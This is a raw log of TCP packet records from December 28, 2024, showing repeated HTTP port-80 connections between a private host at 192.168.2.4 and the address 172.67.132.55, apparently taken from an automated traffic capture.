Dec 28, 2024 22:18:35.479815006 CET	49743	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:35.479840994 CET	49743	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:35.479847908 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:35.479857922 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:35.479893923 CET	49743	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:35.479943991 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:35.479953051 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:35.479999065 CET	49743	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:35.517734051 CET	80	49744	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:35.599117994 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:35.599164963 CET	49743	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:35.599205017 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:35.599212885 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:35.599256992 CET	49743	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:35.599385977 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:35.599390984 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:35.599435091 CET	49743	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:35.639642954 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:35.639739990 CET	49743	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:35.751216888 CET	49744	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:35.759556055 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:35.759618998 CET	49743	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:35.803673983 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:35.870721102 CET	80	49744	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:35.919672012 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:35.919723034 CET	49743	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:35.930974007 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:35.931143045 CET	49743	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:36.039216042 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.039283037 CET	49743	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:36.050776005 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.050782919 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.050808907 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.050833941 CET	49743	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:36.050868988 CET	49743	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:36.050887108 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.050920010 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.050926924 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.050930023 CET	49743	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:36.050959110 CET	49743	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:36.050965071 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.050970078 CET	49743	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:36.051012993 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.051018953 CET	49743	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:36.051120996 CET	49743	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:36.051151037 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.051201105 CET	49743	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:36.051242113 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.051248074 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.051304102 CET	49743	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:36.051335096 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.051390886 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.051584005 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.051625967 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.051688910 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.051749945 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.051892996 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.051911116 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.052067041 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.052128077 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.052233934 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.052334070 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.052340984 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.052479982 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.052522898 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.052668095 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.052691936 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.052834034 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.052839994 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.134447098 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.158963919 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.170569897 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.170763016 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.170876980 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.171005011 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.171010971 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.171061993 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.171149969 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.171158075 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.171286106 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.171341896 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.171401024 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.171438932 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.281691074 CET	49743	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:36.482707977 CET	80	49744	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.586158037 CET	49744	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:36.726767063 CET	80	49744	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.781737089 CET	49744	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:36.855971098 CET	49744	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:36.861572981 CET	49747	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:36.975770950 CET	80	49744	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.979458094 CET	49744	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:36.981084108 CET	80	49747	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:36.981219053 CET	49747	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:36.993808985 CET	49747	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:37.113317013 CET	80	49747	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:37.355578899 CET	49747	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:37.475045919 CET	80	49747	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:37.668978930 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:37.678129911 CET	49743	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:37.797573090 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:38.001485109 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:38.020925045 CET	49743	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:38.112088919 CET	80	49747	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:38.140422106 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:38.140486002 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:38.281697989 CET	49747	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:38.365149021 CET	80	49747	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:38.484819889 CET	49747	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:38.492975950 CET	49747	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:38.494024992 CET	49749	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:38.546721935 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:38.612916946 CET	80	49747	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:38.613373041 CET	49747	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:38.613497972 CET	80	49749	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:38.613815069 CET	49749	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:38.614193916 CET	49749	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:38.658971071 CET	49743	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:38.733668089 CET	80	49749	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:38.747733116 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:38.969307899 CET	49749	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:38.984193087 CET	49743	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:39.088871956 CET	80	49749	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:39.791810989 CET	80	49749	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:39.883233070 CET	49749	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:40.046103954 CET	80	49749	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:40.281748056 CET	49749	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:40.723537922 CET	49743	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:40.723618031 CET	49749	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:40.724514961 CET	49750	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:40.843696117 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:40.843750954 CET	49743	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:40.843765020 CET	80	49749	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:40.843811035 CET	49749	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:40.844091892 CET	80	49750	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:40.844289064 CET	49750	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:40.845496893 CET	49750	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:40.966113091 CET	80	49750	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:41.203747034 CET	49750	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:41.323473930 CET	80	49750	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:41.928742886 CET	80	49750	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:42.078584909 CET	49750	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:42.171760082 CET	80	49750	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:42.281707048 CET	49750	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:42.308259010 CET	49750	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:42.309716940 CET	49751	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:42.428231955 CET	80	49750	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:42.428303957 CET	49750	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:42.429357052 CET	80	49751	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:42.430048943 CET	49751	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:42.430300951 CET	49751	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:42.549742937 CET	80	49751	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:42.782350063 CET	49751	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:42.907594919 CET	80	49751	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:43.562958002 CET	80	49751	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:43.656728983 CET	49751	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:43.751283884 CET	49751	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:43.752116919 CET	49752	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:43.804864883 CET	80	49751	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:43.804932117 CET	49751	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:43.871198893 CET	80	49751	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:43.871283054 CET	49751	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:43.871547937 CET	80	49752	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:43.871659994 CET	49752	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:43.871838093 CET	49752	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:43.876003981 CET	49753	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:43.991260052 CET	80	49752	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:43.995431900 CET	80	49753	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:43.995542049 CET	49753	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:43.995642900 CET	49753	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:44.115353107 CET	80	49753	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:44.219293118 CET	49752	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:44.338793039 CET	80	49752	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:44.338867903 CET	80	49752	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:44.344316959 CET	49753	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:44.463962078 CET	80	49753	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:44.965203047 CET	80	49752	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:45.016077042 CET	49752	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:45.173430920 CET	80	49753	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:45.205291986 CET	80	49752	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:45.219242096 CET	49753	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:45.250468969 CET	49752	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:45.396974087 CET	80	49752	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:45.426094055 CET	80	49753	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:45.437980890 CET	49752	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:45.469221115 CET	49753	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:45.545752048 CET	49752	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:45.545794010 CET	49753	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:45.546458960 CET	49754	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:45.665523052 CET	80	49752	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:45.665601969 CET	49752	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:45.665888071 CET	80	49754	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:45.666095018 CET	80	49753	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:45.666112900 CET	49754	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:45.666140079 CET	49753	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:45.666321039 CET	49754	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:45.785773039 CET	80	49754	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:46.082953930 CET	49754	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:46.204355955 CET	80	49754	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:46.749974012 CET	80	49754	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:46.811474085 CET	49754	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:46.987458944 CET	80	49754	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:47.031774044 CET	49754	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:47.182723045 CET	49755	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:47.302299023 CET	80	49755	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:47.302366018 CET	49755	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:47.302505970 CET	49755	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:47.421961069 CET	80	49755	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:47.657660007 CET	49755	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:47.777153015 CET	80	49755	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:48.433284044 CET	80	49755	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:48.484842062 CET	49755	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:48.680531979 CET	80	49755	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:48.734853029 CET	49755	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:49.400661945 CET	49755	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:49.401192904 CET	49756	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:49.520553112 CET	80	49755	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:49.520603895 CET	49755	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:49.520643950 CET	80	49756	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:49.520709991 CET	49756	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:49.520864964 CET	49756	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:49.641297102 CET	80	49756	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:49.876327038 CET	49756	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:49.996083021 CET	80	49756	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:50.407711029 CET	49756	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:50.408251047 CET	49757	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:50.528233051 CET	49758	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:50.528238058 CET	80	49756	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:50.528306007 CET	49756	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:50.528630018 CET	80	49757	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:50.528718948 CET	49757	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:50.528892040 CET	49757	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:50.648087025 CET	80	49758	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:50.648179054 CET	49758	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:50.648310900 CET	49758	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:50.648423910 CET	80	49757	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:50.767935038 CET	80	49758	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:50.875586987 CET	49757	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:50.995102882 CET	80	49757	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:50.995143890 CET	80	49757	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:51.000559092 CET	49758	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:51.120503902 CET	80	49758	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:51.704438925 CET	80	49757	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:51.750483990 CET	49757	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:51.779419899 CET	80	49758	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:51.828617096 CET	49758	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:51.958070993 CET	80	49757	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:52.000499964 CET	49757	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:52.025027990 CET	80	49758	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:52.078613997 CET	49758	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:52.226099014 CET	80	49758	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:52.266096115 CET	49758	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:52.346820116 CET	49757	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:52.346882105 CET	49758	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:52.347990990 CET	49759	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:52.466619968 CET	80	49757	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:52.466778994 CET	49757	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:52.467055082 CET	80	49758	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:52.467103958 CET	49758	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:52.467719078 CET	80	49759	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:52.467780113 CET	49759	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:52.467895031 CET	49759	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:52.587302923 CET	80	49759	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:52.813074112 CET	49759	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:52.932893991 CET	80	49759	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:53.598453045 CET	80	49759	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:53.656745911 CET	49759	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:53.845257044 CET	80	49759	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:53.891125917 CET	49759	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:53.966142893 CET	49760	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:54.085609913 CET	80	49760	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:54.086267948 CET	49760	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:54.086431980 CET	49760	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:54.205990076 CET	80	49760	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:54.438194036 CET	49760	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:54.557740927 CET	80	49760	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:55.217571974 CET	80	49760	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:55.266099930 CET	49760	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:55.464848042 CET	80	49760	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:55.516115904 CET	49760	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:55.731868982 CET	49759	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:55.739516020 CET	49760	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:55.740155935 CET	49761	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:55.859708071 CET	80	49760	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:55.859781981 CET	49760	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:55.859904051 CET	80	49761	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:55.859970093 CET	49761	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:55.870553017 CET	49761	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:55.990050077 CET	80	49761	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:56.219489098 CET	49761	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:56.339044094 CET	80	49761	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:56.985657930 CET	49761	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:56.986149073 CET	49762	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:57.051827908 CET	80	49761	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:57.051927090 CET	49761	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:57.105326891 CET	49763	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:57.105638981 CET	80	49762	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:57.105648994 CET	80	49761	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:57.105750084 CET	49761	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:57.105751991 CET	49762	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:57.105844021 CET	49762	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:57.224868059 CET	80	49763	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:57.225114107 CET	49763	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:57.225269079 CET	80	49762	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:57.225465059 CET	49763	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:57.344969988 CET	80	49763	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:57.453980923 CET	49762	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:57.573705912 CET	80	49762	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:57.573744059 CET	80	49762	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:57.578743935 CET	49763	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:57.698375940 CET	80	49763	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:58.236699104 CET	80	49762	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:58.281744003 CET	49762	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:58.383411884 CET	80	49763	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:58.438018084 CET	49763	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:58.503462076 CET	80	49762	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:58.547377110 CET	49762	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:58.615850925 CET	80	49763	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:58.656867027 CET	49763	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:58.731941938 CET	49762	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:58.731956005 CET	49763	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:58.732753992 CET	49764	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:58.851813078 CET	80	49762	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:58.851876020 CET	49762	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:58.852190971 CET	80	49763	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:58.852210045 CET	80	49764	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:58.852238894 CET	49763	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:58.852293015 CET	49764	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:58.852401972 CET	49764	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:58.971905947 CET	80	49764	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:59.203747034 CET	49764	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:59.323523045 CET	80	49764	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:59.936306000 CET	80	49764	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:59.984893084 CET	49764	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:00.171462059 CET	80	49764	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:00.219264984 CET	49764	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:00.761383057 CET	49765	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:00.880937099 CET	80	49765	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:00.881021976 CET	49765	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:00.881139994 CET	49765	80	192.168.2.4	172.67.132.55
